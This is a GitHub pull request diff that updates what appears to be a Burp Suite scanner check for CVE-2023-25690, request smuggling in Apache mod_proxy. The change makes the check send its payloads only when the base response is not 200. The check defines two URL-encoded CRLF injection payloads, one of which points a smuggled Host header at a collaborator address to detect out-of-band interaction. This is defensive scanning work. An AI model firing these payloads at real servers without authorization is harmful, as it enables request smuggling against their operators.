Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Only issue payloads if base response status code not 200 (Fixes Issue… #182

Merged
merged 1 commit into from
Feb 22, 2024
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
Original file line number Diff line number Diff line change
@@ -1,33 +1,38 @@
metadata:
language: v1-beta
language: v2-beta
name: "CVE-2023-25690"
description: "Tests for CRLF based HTTP Request Smuggling/Splitting according to CVE-2023-25690"
author: "Peyton Kennedy"

define:
injected_payload1 =`%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0a%0d%0aGET%20/SMUGGLED`
injected_payload2 =`%20HTTP/1.1%0d%0aHost:%20{generate_collaborator_address()}%0d%0a%0d%0aGET%20/SMUGGLED`
injected_payload1 = `%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0a%0d%0aGET%20/SMUGGLED`
injected_payload2 = `%20HTTP/1.1%0d%0aHost:%20{generate_collaborator_address()}%0d%0a%0d%0aGET%20/SMUGGLED`

given request then
send request called split:
method: "GET"
appending path: {injected_payload1}
send request called oob:
method: "GET"
appending path: {injected_payload2}
if not({base.response.status_code} is "200") then
send request called split:
method: "GET"
appending path: {injected_payload1}

if {split.response.body} matches "\"statusCode\":200" or {latest.response.status_code} is "200" then
report issue:
severity: medium
confidence: tentative
detail: "Apache mod_proxy rules appear to be insecurely splitting requests based on URI path. For more detail, refrence CVE-2023-25690"
remediation: "Upgrade to latest version of Apache mod_proxy"
end if
send request called oob:
method: "GET"
appending path: {injected_payload2}

if {split.response.body} matches "\"statusCode\":200" or
{latest.response.status_code} is "200" then
report issue and continue:
severity: medium
confidence: tentative
detail: "Apache mod_proxy rules appear to be insecurely splitting requests based on URI path. For more detail, refrence CVE-2023-25690"
remediation: "Upgrade to latest version of Apache mod_proxy"
end if

if http interactions then
report issue:
severity: high
confidence: firm
detail: "External interaction is detected from an arbitrary host header due to CVE-2023-25690"
remediation: "Upgrade to latest version of Apache mod_proxy"
end if
end if

if http interactions then
report issue:
severity: high
confidence: firm
detail: "External interaction is detected from an arbitrary host header due to CVE-2023-25690"
remediation: "Upgrade to latest version of Apache mod_proxy"
end if
Loading